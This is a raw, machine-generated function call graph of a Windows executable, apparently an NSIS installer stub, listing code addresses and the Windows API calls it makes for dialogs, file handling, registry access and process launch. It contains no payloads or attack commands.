404117 3599->3602 3600->3597 3634 4044af 3601->3634 3602->3570 3602->3601 3604 404288 GetDlgItem 3605 4042a5 ShowWindow KiUserCallbackDispatcher 3604->3605 3606 40429d 3604->3606 3631 4044f8 KiUserCallbackDispatcher 3605->3631 3606->3605 3608 4042cf EnableWindow 3613 4042e3 3608->3613 3609 4042e8 GetSystemMenu EnableMenuItem SendMessageW 3610 404318 SendMessageW 3609->3610 3609->3613 3610->3613 3612 403fb8 22 API calls 3612->3613 3613->3609 3613->3612 3632 40450b SendMessageW 3613->3632 3633 406557 lstrcpynW 3613->3633 3615 404347 lstrlenW 3616 406594 21 API calls 3615->3616 3617 40435d SetWindowTextW 3616->3617 3618 401389 2 API calls 3617->3618 3618->3597 3619->3577 3620 4043bb CreateDialogParamW 3619->3620 3620->3577 3621 4043ee 3620->3621 3622 4044d6 22 API calls 3621->3622 3623 4043f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 3622->3623 3624 401389 2 API calls 3623->3624 3625 40443f 3624->3625 3625->3575 3626 404447 ShowWindow 3625->3626 3627 404522 SendMessageW 3626->3627 3627->3577 3629 406594 21 API calls 3628->3629 3630 4044e1 SetDlgItemTextW 3629->3630 3630->3604 3631->3608 3632->3613 3633->3615 3635 4044b6 3634->3635 3636 4044bc SendMessageW 3634->3636 3635->3636 3636->3596 3638 404555 GetWindowLongW 3637->3638 3648 404600 3637->3648 3639 40456a 3638->3639 3638->3648 3640 404597 GetSysColor 3639->3640 3641 40459a 3639->3641 3639->3648 3640->3641 3642 4045a0 SetTextColor 3641->3642 3643 4045aa SetBkMode 3641->3643 3642->3643 3644 4045c2 GetSysColor 3643->3644 3645 4045c8 3643->3645 3644->3645 3646 4045d9 3645->3646 3647 4045cf SetBkColor 3645->3647 3646->3648 3649 4045f3 CreateBrushIndirect 3646->3649 3650 4045ec DeleteObject 3646->3650 3647->3646 3648->3575 3649->3648 3650->3649 4011 4014d7 4012 402d89 21 API calls 4011->4012 4013 4014dd Sleep 4012->4013 4015 402c2f 4013->4015 4016 40195b 4017 402dab 21 API calls 4016->4017 4018 401962 lstrlenW 4017->4018 4019 40263d 4018->4019 3712 4020dd 3713 4021a1 3712->3713 3714 4020ef 3712->3714 3716 401423 28 API calls 3713->3716 3715 402dab 21 API calls 3714->3715 3717 4020f6 3715->3717 3723 4022fb 3716->3723 3718 402dab 21 API calls 3717->3718 3719 4020ff 3718->3719 3720 402115 LoadLibraryExW 3719->3720 3721 402107 GetModuleHandleW 3719->3721 3720->3713 3722 402126 3720->3722 3721->3720 3721->3722 3732 4069ba 3722->3732 3726 402170 3728 4055dc 28 API calls 3726->3728 3727 402137 3729 402147 3727->3729 3730 401423 28 API calls 3727->3730 3728->3729 3729->3723 3731 402193 FreeLibrary 3729->3731 3730->3729 3731->3723 3737 406579 WideCharToMultiByte 3732->3737 3734 4069d7 3735 402131 3734->3735 3736 4069de GetProcAddress 3734->3736 3735->3726 3735->3727 3736->3735 3737->3734 4020 402b5e 4021 402bb0 4020->4021 4022 402b65 4020->4022 4023 40694b 5 API calls 4021->4023 4025 402d89 21 API calls 4022->4025 4028 402bae 4022->4028 4024 402bb7 4023->4024 4026 402dab 21 API calls 4024->4026 4027 402b73 4025->4027 4029 402bc0 4026->4029 4030 402d89 21 API calls 4027->4030 4029->4028 4031 402bc4 IIDFromString 4029->4031 4034 402b7f 4030->4034 4031->4028 4032 402bd3 4031->4032 4032->4028 4038 406557 lstrcpynW 4032->4038 4037 40649e wsprintfW 4034->4037 4035 402bf0 CoTaskMemFree 4035->4028 4037->4028 4038->4035 2937 401761 2943 402dab 2937->2943 2941 40176f 2942 406076 2 API calls 2941->2942 2942->2941 2944 402db7 2943->2944 2953 406594 2944->2953 2947 401768 2949 406076 2947->2949 2950 406083 GetTickCount GetTempFileNameW 2949->2950 2951 4060bd 2950->2951 2952 4060b9 2950->2952 2951->2941 2952->2950 2952->2951 2968 40659f 2953->2968 2954 4067e6 2955 402dd8 2954->2955 2992 406557 lstrcpynW 2954->2992 2955->2947 2970 406805 2955->2970 2957 4067b7 lstrlenW 2957->2968 2959 4066b0 GetSystemDirectoryW 2959->2968 2960 406594 15 API calls 2960->2957 2963 4066c6 GetWindowsDirectoryW 2963->2968 2964 406594 15 API calls 2964->2968 2965 406758 lstrcatW 2965->2968 2966 406805 5 API calls 2966->2968 2968->2954 2968->2957 2968->2959 2968->2960 2968->2963 2968->2964 2968->2965 2968->2966 2969 406728 SHGetPathFromIDListW CoTaskMemFree 2968->2969 2979 406425 2968->2979 2984 40694b GetModuleHandleA 2968->2984 2990 40649e wsprintfW 2968->2990 2991 406557 lstrcpynW 2968->2991 2969->2968 2976 406812 2970->2976 2971 40688d CharPrevW 2972 406888 2971->2972 2972->2971 2974 4068ae 2972->2974 2973 40687b CharNextW 2973->2972 2973->2976 2974->2947 2976->2972 2976->2973 2977 406867 CharNextW 2976->2977 2978 406876 CharNextW 2976->2978 3000 405e53 2976->3000 2977->2976 2978->2973 2993 4063c4 2979->2993 2982 406489 2982->2968 2983 406459 RegQueryValueExW RegCloseKey 2983->2982 2985 406971 GetProcAddress 2984->2985 2986 406967 2984->2986 2987 406980 2985->2987 2997 4068db GetSystemDirectoryW 2986->2997 2987->2968 2989 40696d 2989->2985 2989->2987 2990->2968 2991->2968 2992->2955 2994 4063d3 2993->2994 2995 4063d7 2994->2995 2996 4063dc RegOpenKeyExW 2994->2996 2995->2982 2995->2983 2996->2995 2998 4068fd wsprintfW LoadLibraryExW 2997->2998 2998->2989 3001 405e59 3000->3001 3002 405e6f 3001->3002 3003 405e60 CharNextW 3001->3003 3002->2976 3003->3001 4039 401d62 4040 402d89 21 API calls 4039->4040 4041 401d73 SetWindowLongW 4040->4041 4042 402c2f 4041->4042 3004 401ee3 3012 402d89 3004->3012 3006 401ee9 3007 402d89 21 API calls 3006->3007 3008 401ef5 3007->3008 3009 401f01 ShowWindow 3008->3009 3010 401f0c EnableWindow 3008->3010 3011 402c2f 3009->3011 3010->3011 3013 406594 21 API calls 3012->3013 3014 402d9e 3013->3014 3014->3006 4043 4028e3 4044 4028eb 4043->4044 4045 4028ef FindNextFileW 4044->4045 4047 402901 4044->4047 4046 402948 4045->4046 4045->4047 4049 406557 lstrcpynW 4046->4049 4049->4047 4050 403be7 4051 403bf2 4050->4051 4052 403bf6 4051->4052 4053 403bf9 GlobalAlloc 4051->4053 4053->4052 4054 401568 4055 402ba9 4054->4055 4058 40649e wsprintfW 4055->4058 4057 402bae 4058->4057 4059 40196d 4060 402d89 21 API calls 4059->4060 4061 401974 4060->4061 4062 402d89 21 API calls 4061->4062 4063 401981 4062->4063 4064 402dab 21 API calls 4063->4064 4065 401998 lstrlenW 4064->4065 4067 4019a9 4065->4067 4066 4019ea 4067->4066 4071 406557 lstrcpynW 4067->4071 4069 4019da 4069->4066 4070 4019df lstrlenW 4069->4070 4070->4066 4071->4069 4072 40166f 4073 402dab 21 API calls 4072->4073 4074 401675 4073->4074 4075 4068b4 2 API calls 4074->4075 4076 40167b 4075->4076 4077 402af0 4078 402d89 21 API calls 4077->4078 4079 402af6 4078->4079 4080 406594 21 API calls 4079->4080 4081 402933 4079->4081 4080->4081 4082 4026f1 4083 402d89 21 API calls 4082->4083 4085 402700 4083->4085 4084 40274a ReadFile 4084->4085 4094 40283d 4084->4094 4085->4084 4086 4060ca ReadFile 4085->4086 4087 406128 5 API calls 4085->4087 4088 40278a MultiByteToWideChar 4085->4088 4089 40283f 4085->4089 4091 4027b0 SetFilePointer MultiByteToWideChar 4085->4091 4092 402850 4085->4092 4085->4094 4086->4085 4087->4085 4088->4085 4095 40649e wsprintfW 4089->4095 4091->4085 4093 402871 SetFilePointer 4092->4093 4092->4094 4093->4094 4095->4094 3514 401774 3515 402dab 21 API calls 3514->3515 3516 40177b 3515->3516 3517 4017a3 3516->3517 3518 40179b 3516->3518 3554 406557 lstrcpynW 3517->3554 3553 406557 lstrcpynW 3518->3553 3521 4017a1 3525 406805 5 API calls 3521->3525 3522 4017ae 3523 405e26 3 API calls 3522->3523 3524 4017b4 lstrcatW 3523->3524 3524->3521 3535 4017c0 3525->3535 3526 4068b4 2 API calls 3526->3535 3527 406022 2 API calls 3527->3535 3529 4017d2 CompareFileTime 3529->3535 3530 401892 3531 4055dc 28 API calls 3530->3531 3533 40189c 3531->3533 3532 4055dc 28 API calls 3534 40187e 3532->3534 3536 4032b9 35 API calls 3533->3536 3535->3526 3535->3527 3535->3529 3535->3530 3539 406594 21 API calls 3535->3539 3544 406557 lstrcpynW 3535->3544 3549 405bb7 MessageBoxIndirectW 3535->3549 3550 401869 3535->3550 3552 406047 GetFileAttributesW CreateFileW 3535->3552 3537 4018af 3536->3537 3538 4018c3 SetFileTime 3537->3538 3540 4018d5 CloseHandle 3537->3540 3538->3540 3539->3535 3540->3534 3541 4018e6 3540->3541 3542 4018eb 3541->3542 3543 4018fe 3541->3543 3545 406594 21 API calls 3542->3545 3546 406594 21 API calls 3543->3546 3544->3535 3547 4018f3 lstrcatW 3545->3547 3548 401906 3546->3548 3547->3548 3551 405bb7 MessageBoxIndirectW 3548->3551 3549->3535 3550->3532 3550->3534 3551->3534 3552->3535 3553->3521 3554->3522 4096 4014f5 SetForegroundWindow 4097 402c2f 4096->4097 4098 401a77 4099 402d89 21 API calls 4098->4099 4100 401a80 4099->4100 4101 402d89 21 API calls 4100->4101 4102 401a25 4101->4102 3651 401578 3652 401591 3651->3652 3653 401588 ShowWindow 3651->3653 3654 402c2f 3652->3654 3655 40159f ShowWindow 3652->3655 3653->3652 3655->3654 3656 4023f9 3657 402dab 21 API calls 3656->3657 3658 402408 3657->3658 3659 402dab 21 API calls 3658->3659 3660 402411 3659->3660 3661 402dab 21 API calls 3660->3661 3662 40241b GetPrivateProfileStringW 3661->3662 4103 401ffb 4104 402dab 21 API calls 4103->4104 4105 402002 4104->4105 4106 4068b4 2 API calls 4105->4106 4107 402008 4106->4107 4109 402019 4107->4109 4110 40649e wsprintfW 4107->4110 4110->4109 4111 401b7c 4112 402dab 21 API calls 4111->4112 4113 401b83 4112->4113 4114 402d89 21 API calls 4113->4114 4115 401b8c wsprintfW 4114->4115 4116 402c2f 4115->4116 4117 401000 4118 401037 BeginPaint GetClientRect 4117->4118 4119 40100c DefWindowProcW 4117->4119 4121 4010f3 4118->4121 4124 401179 4119->4124 4122 401073 CreateBrushIndirect FillRect DeleteObject 4121->4122 4123 4010fc 4121->4123 4122->4121 4125 401102 CreateFontIndirectW 4123->4125 4126 401167 EndPaint 4123->4126 4125->4126 4127 401112 6 API calls 4125->4127 4126->4124 4127->4126 4128 404980 4129 404990 4128->4129 4130 4049b6 4128->4130 4132 4044d6 22 API calls 4129->4132 4131 40453d 8 API calls 4130->4131 4133 4049c2 4131->4133 4134 40499d SetDlgItemTextW 4132->4134 4134->4130 4135 401680 4136 402dab 21 API calls 4135->4136 4137 401687 4136->4137 4138 402dab 21 API calls 4137->4138 4139 401690 4138->4139 4140 402dab 21 API calls 4139->4140 4141 401699 MoveFileW 4140->4141 4142 4016a5 4141->4142 4143 4016ac 4141->4143 4144 401423 28 API calls 4142->4144 4145 4068b4 2 API calls 4143->4145 4147 4022fb 4143->4147 4144->4147 4146 4016bb 4145->4146 4146->4147 4148 406317 40 API calls 4146->4148 4148->4142 4149 401503 4150 401508 4149->4150 4152 401520 4149->4152 4151 402d89 21 API calls 4150->4151 4151->4152 4153 401a04 4154 402dab 21 API calls 4153->4154 4155 401a0b 4154->4155 4156 402dab 21 API calls 4155->4156 4157 401a14 4156->4157 4158 401a1b lstrcmpiW 4157->4158 4159 401a2d lstrcmpW 4157->4159 4160 401a21 4158->4160 4159->4160 4161 402304 4162 402dab 21 API calls 4161->4162 4163 40230a 4162->4163 4164 402dab 21 API calls 4163->4164 4165 402313 4164->4165 4166 402dab 21 API calls 4165->4166 4167 40231c 4166->4167 4168 4068b4 2 API calls 4167->4168 4169 402325 4168->4169 4170 402336 lstrlenW lstrlenW 4169->4170 4171 402329 4169->4171 4173 4055dc 28 API calls 4170->4173 4172 4055dc 28 API calls 4171->4172 4175 402331 4171->4175 4172->4175 4174 402374 SHFileOperationW 4173->4174 4174->4171 4174->4175 4176 401d86 4177 401d99 GetDlgItem 4176->4177 4178 401d8c 4176->4178 4180 401d93 4177->4180 4179 402d89 21 API calls 4178->4179 4179->4180 4181 401dda GetClientRect LoadImageW SendMessageW 4180->4181 4182 402dab 21 API calls 4180->4182 4184 401e38 4181->4184 4186 401e44 4181->4186 4182->4181 4185 401e3d DeleteObject 4184->4185 4184->4186 4185->4186 4187 402388 4188 40238f 4187->4188 4192 4023a2 4187->4192 4189 406594 21 API calls 4188->4189 4190 40239c 4189->4190 4191 405bb7 MessageBoxIndirectW 4190->4191 4191->4192 4193 402c0a SendMessageW 4194 402c24 InvalidateRect 4193->4194 4195 402c2f 4193->4195 4194->4195 4196 40460c lstrcpynW lstrlenW 4197 40248f 4198 402dab 21 API calls 4197->4198 4199 4024a1 4198->4199 4200 402dab 21 API calls 4199->4200 4201 4024ab 4200->4201 4214 402e3b 4201->4214 4204 4024e3 4206 4024ef 4204->4206 4208 402d89 21 API calls 4204->4208 4205 402933 4209 40250e RegSetValueExW 4206->4209 4211 4032b9 35 API calls 4206->4211 4207 402dab 21 API calls 4210 4024d9 lstrlenW 4207->4210 4208->4206 4212 402524 RegCloseKey 4209->4212 4210->4204 4211->4209 4212->4205 4215 402e56 4214->4215 4218 4063f2 4215->4218 4219 406401 4218->4219 4220 4024bb 4219->4220 4221 40640c RegCreateKeyExW 4219->4221 4220->4204 4220->4205 4220->4207 4221->4220 4222 402910 4223 402dab 21 API calls 4222->4223 4224 402917 FindFirstFileW 4223->4224 4225 40293f 4224->4225 4229 40292a 4224->4229 4230 40649e wsprintfW 4225->4230 4227 402948 4231 406557 lstrcpynW 4227->4231 4230->4227 4231->4229 4232 401911 4233 401948 4232->4233 4234 402dab 21 API calls 4233->4234 4235 40194d 4234->4235 4236 405c63 71 API calls 4235->4236 4237 401956 4236->4237 4238 401491 4239 4055dc 28 API calls 4238->4239 4240 401498 4239->4240 4241 401914 4242 402dab 21 API calls 4241->4242 4243 40191b 4242->4243 4244 405bb7 MessageBoxIndirectW 4243->4244 4245 401924 4244->4245 4246 404695 4247 4046ad 4246->4247 4253 4047c7 4246->4253 4254 4044d6 22 API calls 4247->4254 4248 404831 4249 4048fb 4248->4249 4250 40483b GetDlgItem 4248->4250 4255 40453d 8 API calls 4249->4255 4251 404855 4250->4251 4252 4048bc 4250->4252 4251->4252 4258 40487b SendMessageW LoadCursorW SetCursor 4251->4258 4252->4249 4259 4048ce 4252->4259 4253->4248 4253->4249 4256 404802 GetDlgItem SendMessageW 4253->4256 4257 404714 4254->4257 4269 4048f6 4255->4269 4279 4044f8 KiUserCallbackDispatcher 4256->4279 4261 4044d6 22 API calls 4257->4261 4280 404944 4258->4280 4264 4048e4 4259->4264 4265 4048d4 SendMessageW 4259->4265 4262 404721 CheckDlgButton 4261->4262 4277 4044f8 KiUserCallbackDispatcher 4262->4277 4264->4269 4270 4048ea SendMessageW 4264->4270 4265->4264 4266 40482c 4271 404920 SendMessageW 4266->4271 4270->4269 4271->4248 4272 40473f GetDlgItem 4278 40450b SendMessageW 4272->4278 4274 404755 SendMessageW 4275 404772 GetSysColor 4274->4275 4276 40477b SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 4274->4276 4275->4276 4276->4269 4277->4272 4278->4274 4279->4266 4283 405b7d ShellExecuteExW 4280->4283 4282 4048aa LoadCursorW SetCursor 4282->4252 4283->4282 4284 402896 4285 40289d 4284->4285 4291 402bae 4284->4291 4286 402d89 21 API calls 4285->4286 4287 4028a4 4286->4287 4288 4028b3 SetFilePointer 4287->4288 4289 4028c3 4288->4289 4288->4291 4292 40649e wsprintfW 4289->4292 4292->4291 4293 401f17 4294 402dab 21 API calls 4293->4294 4295 401f1d 4294->4295 4296 402dab 21 API calls 4295->4296 4297 401f26 4296->4297 4298 402dab 21 API calls 4297->4298 4299 401f2f 4298->4299 4300 402dab 21 API calls 4299->4300 4301 401f38 4300->4301 4302 401423 28 API calls 4301->4302 4303 401f3f 4302->4303 4310 405b7d ShellExecuteExW 4303->4310 4305 401f87 4306 402933 4305->4306 4307 4069f6 5 API calls 4305->4307 4308 401fa4 CloseHandle 4307->4308 4308->4306 4310->4305 4311 402f98 4312 402fc3 4311->4312 4313 402faa SetTimer 4311->4313 4314 403018 4312->4314 4315 402fdd MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4312->4315 4313->4312 4315->4314 3663 40571b 3664 4058c5 3663->3664 3665 40573c GetDlgItem GetDlgItem GetDlgItem 3663->3665 3667 4058f6 3664->3667 3668 4058ce GetDlgItem CreateThread CloseHandle 3664->3668 3708 40450b SendMessageW 3665->3708 3670 405921 3667->3670 3672 405946 3667->3672 3673 40590d ShowWindow ShowWindow 3667->3673 3668->3667 3711 4056af 5 API calls 3668->3711 3669 4057ac 3678 4057b3 GetClientRect GetSystemMetrics SendMessageW SendMessageW 3669->3678 3671 405981 3670->3671 3675 405935 3670->3675 3676 40595b ShowWindow 3670->3676 3671->3672 3685 40598f SendMessageW 3671->3685 3677 40453d 8 API calls 3672->3677 3710 40450b SendMessageW 3673->3710 3679 4044af SendMessageW 3675->3679 3681 40597b 3676->3681 3682 40596d 3676->3682 3680 405954 3677->3680 3683 405821 3678->3683 3684 405805 SendMessageW SendMessageW 3678->3684 3679->3672 3690 4044af SendMessageW 3681->3690 3689 4055dc 28 API calls 3682->3689 3686 405834 3683->3686 3687 405826 SendMessageW 3683->3687 3684->3683 3685->3680 3688 4059a8 CreatePopupMenu 3685->3688 3692 4044d6 22 API calls 3686->3692 3687->3686 3691 406594 21 API calls 3688->3691 3689->3681 3690->3671 3693 4059b8 AppendMenuW 3691->3693 3694 405844 3692->3694 3695 4059d5 GetWindowRect 3693->3695 3696 4059e8 TrackPopupMenu 3693->3696 3697 405881 GetDlgItem SendMessageW 3694->3697 3698 40584d ShowWindow 3694->3698 3695->3696 3696->3680 3699 405a03 3696->3699 3697->3680 3702 4058a8 SendMessageW SendMessageW 3697->3702 3700 405870 3698->3700 3701 405863 ShowWindow 3698->3701 3703 405a1f SendMessageW 3699->3703 3709 40450b SendMessageW 3700->3709 3701->3700 3702->3680 3703->3703 3704 405a3c OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 3703->3704 3706 405a61 SendMessageW 3704->3706 3706->3706 3707 405a8a GlobalUnlock SetClipboardData CloseClipboard 3706->3707 3707->3680 3708->3669 3709->3697 3710->3670 4316 401d1c 4317 402d89 21 API calls 4316->4317 4318 401d22 IsWindow 4317->4318 4319 401a25 4318->4319 4320 404d1d 4321 404d49 4320->4321 4322 404d2d 4320->4322 4323 404d7c 4321->4323 4324 404d4f SHGetPathFromIDListW 4321->4324 4331 405b9b GetDlgItemTextW 4322->4331 4326 404d5f 4324->4326 4330 404d66 SendMessageW 4324->4330 4328 40140b 2 API calls 4326->4328 4327 404d3a SendMessageW 4327->4321 4328->4330 4330->4323 4331->4327 4332 40149e 4333 4023a2 4332->4333 4334 4014ac PostQuitMessage 4332->4334 4334->4333 4335 401ba0 4336 401bf1 4335->4336 4341 401bad 4335->4341 4337 401bf6 4336->4337 4338 401c1b GlobalAlloc 4336->4338 4344 4023a2 4337->4344 4356 406557 lstrcpynW 4337->4356 4339 406594 21 API calls 4338->4339 4345 401c36 4339->4345 4340 406594 21 API calls 4346 40239c 4340->4346 4342 401bc4 4341->4342 4341->4345 4354 406557 lstrcpynW 4342->4354 4345->4340 4345->4344 4350 405bb7 MessageBoxIndirectW 4346->4350 4348 401c08 GlobalFree 4348->4344 4349 401bd3 4355 406557 lstrcpynW 4349->4355 4350->4344 4352 401be2 4357 406557 lstrcpynW 4352->4357 4354->4349 4355->4352 4356->4348 4357->4344 4358 402621 4359 402dab 21 API calls 4358->4359 4360 402628 4359->4360 4363 406047 GetFileAttributesW CreateFileW 4360->4363 4362 402634 4363->4362 4364 4025a3 4365 402deb 21 API calls 4364->4365 4366 4025ad 4365->4366 4367 402d89 21 API calls 4366->4367 4368 4025b6 4367->4368 4369 4025d2 RegEnumKeyW 4368->4369 4370 4025de RegEnumValueW 4368->4370 4371 402933 4368->4371 4372 4025f3 RegCloseKey 4369->4372 4370->4372 4372->4371 3190 4015a8 3191 402dab 21 API calls 3190->3191 3192 4015af SetFileAttributesW 3191->3192 3193 4015c1 3192->3193 3194 401fa9 3195 402dab 21 API calls 3194->3195 3196 401faf 3195->3196 3197 4055dc 28 API calls 3196->3197 3198 401fb9 3197->3198 3209 405b3a CreateProcessW 3198->3209 3203 402933 3204 401fd4 3205 401fe4 3204->3205 3206 401fd9 3204->3206 3207 401fe2 CloseHandle 3205->3207 3217 40649e wsprintfW 3206->3217 3207->3203 3210 401fbf 3209->3210 3211 405b6d CloseHandle 3209->3211 3210->3203 3210->3207 3212 4069f6 WaitForSingleObject 3210->3212 3211->3210 3213 406a10 3212->3213 3214 406a22 GetExitCodeProcess 3213->3214 3218 406987 3213->3218 3214->3204 3217->3207 3219 4069a4 PeekMessageW 3218->3219 3220 4069b4 WaitForSingleObject 3219->3220 3221 40699a DispatchMessageW 3219->3221 3220->3213 3221->3219 3222 40252f 3233 402deb 3222->3233 3225 402dab 21 API calls 3226 402542 3225->3226 3227 40254d RegQueryValueExW 3226->3227 3232 402933 3226->3232 3228 402573 RegCloseKey 3227->3228 3229 40256d 3227->3229 3228->3232 3229->3228 3238 40649e wsprintfW 3229->3238 3234 402dab 21 API calls 3233->3234 3235 402e02 3234->3235 3236 4063c4 RegOpenKeyExW 3235->3236 3237 402539 3236->3237 3237->3225 3238->3228 4374 40202f 4375 402dab 21 API calls 4374->4375 4376 402036 4375->4376 4377 40694b 5 API calls 4376->4377 4378 402045 4377->4378 4379 402061 GlobalAlloc 4378->4379 4382 4020d1 4378->4382 4380 402075 4379->4380 4379->4382 4381 40694b 5 API calls 4380->4381 4383 40207c 4381->4383 4384 40694b 5 API calls 4383->4384 4385 402086 4384->4385 4385->4382 4389 40649e wsprintfW 4385->4389 4387 4020bf 4390 40649e wsprintfW 4387->4390 4389->4387 4390->4382 4391 4021af 4392 402dab 21 API calls 4391->4392 4393 4021b6 4392->4393 4394 402dab 21 API calls 4393->4394 4395 4021c0 4394->4395 4396 402dab 21 API calls 4395->4396 4397 4021ca 4396->4397 4398 402dab 21 API calls 4397->4398 4399 4021d4 4398->4399 4400 402dab 21 API calls 4399->4400 4401 4021de 4400->4401 4402 40221d CoCreateInstance 4401->4402 4403 402dab 21 API calls 4401->4403 4404 40223c 4402->4404 4403->4402 4405 401423 28 API calls 4404->4405 4406 4022fb 4404->4406 4405->4406 3239 403532 SetErrorMode GetVersionExW 3240 403586 GetVersionExW 3239->3240 3241 4035be 3239->3241 3240->3241 3242 403615 3241->3242 3243 40694b 5 API calls 3241->3243 3244 4068db 3 API calls 3242->3244 3243->3242 3245 40362b lstrlenA 3244->3245 3245->3242 3246 40363b 3245->3246 3247 40694b 5 API calls 3246->3247 3248 403642 3247->3248 3249 40694b 5 API calls 3248->3249 3250 403649 3249->3250 3251 40694b 5 API calls 3250->3251 3255 403655 #17 OleInitialize SHGetFileInfoW 3251->3255 3254 4036a4 GetCommandLineW 3328 406557 lstrcpynW 3254->3328 3327 406557 lstrcpynW 3255->3327 3257 4036b6 3258 405e53 CharNextW 3257->3258 3259 4036dc CharNextW 3258->3259 3267 4036ee 3259->3267 3260 4037f0 3261 403804 GetTempPathW 3260->3261 3329 403501 3261->3329 3263 40381c 3264 403820 GetWindowsDirectoryW lstrcatW 3263->3264 3265 403876 DeleteFileW 3263->3265 3268 403501 12 API calls 3264->3268 3339 403082 GetTickCount GetModuleFileNameW 3265->3339 3266 405e53 CharNextW 3266->3267 3267->3260 3267->3266 3273 4037f2 3267->3273 3270 40383c 3268->3270 3270->3265 3272 403840 GetTempPathW lstrcatW SetEnvironmentVariableW SetEnvironmentVariableW 3270->3272 3271 40388a 3274 403941 3271->3274 3277 403931 3271->3277 3281 405e53 CharNextW 3271->3281 3275 403501 12 API calls 3272->3275 3423 406557 lstrcpynW 3273->3423 3428 403b4f 3274->3428 3279 40386e 3275->3279 3367 403c29 3277->3367 3279->3265 3279->3274 3294 4038a9 3281->3294 3283 403ab3 3285 403b37 ExitProcess 3283->3285 3286 403abb GetCurrentProcess OpenProcessToken 3283->3286 3284 403a8f 3435 405bb7 3284->3435 3288 403ad3 LookupPrivilegeValueW AdjustTokenPrivileges 3286->3288 3289 403b07 3286->3289 3288->3289 3296 40694b 5 API calls 3289->3296 3290 403907 3297 405f2e 18 API calls 3290->3297 3291 40394a 3295 405b22 5 API calls 3291->3295 3294->3290 3294->3291 3298 40394f lstrlenW 3295->3298 3299 403b0e 3296->3299 3300 403913 3297->3300 3426 406557 lstrcpynW 3298->3426 3302 403b23 ExitWindowsEx 3299->3302 3304 403b30 3299->3304 3300->3274 3424 406557 lstrcpynW 3300->3424 3302->3285 3302->3304 3303 403969 3306 403981 3303->3306 3427 406557 lstrcpynW 3303->3427 3439 40140b 3304->3439 3311 4039a7 wsprintfW 3306->3311 3324 4039d3 3306->3324 3308 403926 3425 406557 lstrcpynW 3308->3425 3312 406594 21 API calls 3311->3312 3312->3306 3313 405b05 2 API calls 3313->3324 3314 405aab 2 API calls 3314->3324 3315 4039e3 GetFileAttributesW 3317 4039ef DeleteFileW 3315->3317 3315->3324 3316 403a1d SetCurrentDirectoryW 3318 406317 40 API calls 3316->3318 3317->3324 3319 403a2c CopyFileW 3318->3319 3319->3274 3319->3324 3320 405c63 71 API calls 3320->3324 3321 406317 40 API calls 3321->3324 3322 406594 21 API calls 3322->3324 3323 405b3a 2 API calls 3323->3324 3324->3274 3324->3306 3324->3311 3324->3313 3324->3314 3324->3315 3324->3316 3324->3320 3324->3321 3324->3322 3324->3323 3325 403aa5 CloseHandle 3324->3325 3326 4068b4 2 API calls 3324->3326 3325->3274 3326->3324 3327->3254 3328->3257 3330 406805 5 API calls 3329->3330 3332 40350d 3330->3332 3331 403517 3331->3263 3332->3331 3333 405e26 3 API calls 3332->3333 3334 40351f 3333->3334 3335 405b05 2 API calls 3334->3335 3336 403525 3335->3336 3337 406076 2 API calls 3336->3337 3338 403530 3337->3338 3338->3263 3442 406047 GetFileAttributesW CreateFileW 3339->3442 3341 4030c2 3362 4030d2 3341->3362 3443 406557 lstrcpynW 3341->3443 3343 4030e8 3344 405e72 2 API calls 3343->3344 3345 4030ee 3344->3345 3444 406557 lstrcpynW 3345->3444 3347 4030f9 GetFileSize 3348 4031f3 3347->3348 3352 403110 3347->3352 3445 40301e 3348->3445 3350 4031fc 3353 40322c GlobalAlloc 3350->3353 3350->3362 3480 4034ea SetFilePointer 3350->3480 3352->3348 3354 40325f 3352->3354 3352->3362 3364 40301e 6 API calls 3352->3364 3477 4034d4 3352->3477 3456 4034ea SetFilePointer 3353->3456 3359 40301e 6 API calls 3354->3359 3357 403215 3360 4034d4 ReadFile 3357->3360 3358 403247 3457 4032b9 3358->3457 3359->3362 3363 403220 3360->3363 3362->3271 3363->3353 3363->3362 3364->3352 3366 403290 SetFilePointer 3366->3362 3368 40694b 5 API calls 3367->3368 3369 403c3d 3368->3369 3370 403c43 3369->3370 3371 403c55 3369->3371 3497 40649e wsprintfW 3370->3497 3372 406425 3 API calls 3371->3372 3373 403c85 3372->3373 3374 403ca4 lstrcatW 3373->3374 3377 406425 3 API calls 3373->3377 3376 403c53 3374->3376 3482 403eff 3376->3482 3377->3374 3380 405f2e 18 API calls 3381 403cd6 3380->3381 3382 403d6a 3381->3382 3385 406425 3 API calls 3381->3385 3383 405f2e 18 API calls 3382->3383 3384 403d70 3383->3384 3386 403d80 LoadImageW 3384->3386 3388 406594 21 API calls 3384->3388 3387 403d08 3385->3387 3389 403e26 3386->3389 3390 403da7 RegisterClassW 3386->3390 3387->3382 3391 403d29 lstrlenW 3387->3391 3394 405e53 CharNextW 3387->3394 3388->3386 3393 40140b 2 API calls 3389->3393 3392 403ddd SystemParametersInfoW CreateWindowExW 3390->3392 3422 403e30 3390->3422 3395 403d37 lstrcmpiW 3391->3395 3396 403d5d 3391->3396 3392->3389 3397 403e2c 3393->3397 3398 403d26 3394->3398 3395->3396 3399 403d47 GetFileAttributesW 3395->3399 3400 405e26 3 API calls 3396->3400 3402 403eff 22 API calls 3397->3402 3397->3422 3398->3391 3401 403d53 3399->3401 3403 403d63 3400->3403 3401->3396 3404 405e72 2 API calls 3401->3404 3405 403e3d 3402->3405 3498 406557 lstrcpynW 3403->3498 3404->3396 3407 403e49 ShowWindow 3405->3407 3408 403ecc 3405->3408 3410 4068db 3 API calls 3407->3410 3490 4056af OleInitialize 3408->3490 3412 403e61 3410->3412 3411 403ed2 3414 403ed6 3411->3414 3415 403eee 3411->3415 3413 403e6f GetClassInfoW 3412->3413 3416 4068db 3 API calls 3412->3416 3418 403e83 GetClassInfoW RegisterClassW 3413->3418 3419 403e99 DialogBoxParamW 3413->3419 3421 40140b 2 API calls 3414->3421 3414->3422 3417 40140b 2 API calls 3415->3417 3416->3413 3417->3422 3418->3419 3420 40140b 2 API calls 3419->3420 3420->3422 3421->3422 3422->3274 3423->3261 3424->3308 3425->3277 3426->3303 3427->3306 3429 403b67 3428->3429 3430 403b59 CloseHandle 3428->3430 3510 403b94 3429->3510 3430->3429 3433 405c63 71 API calls 3434 403a82 OleUninitialize 3433->3434 3434->3283 3434->3284 3436 405bcc 3435->3436 3437 403a9d ExitProcess 3436->3437 3438 405be0 MessageBoxIndirectW 3436->3438 3438->3437 3440 401389 2 API calls 3439->3440 3441 401420 3440->3441 3441->3285 3442->3341 3443->3343 3444->3347 3446 403027 3445->3446 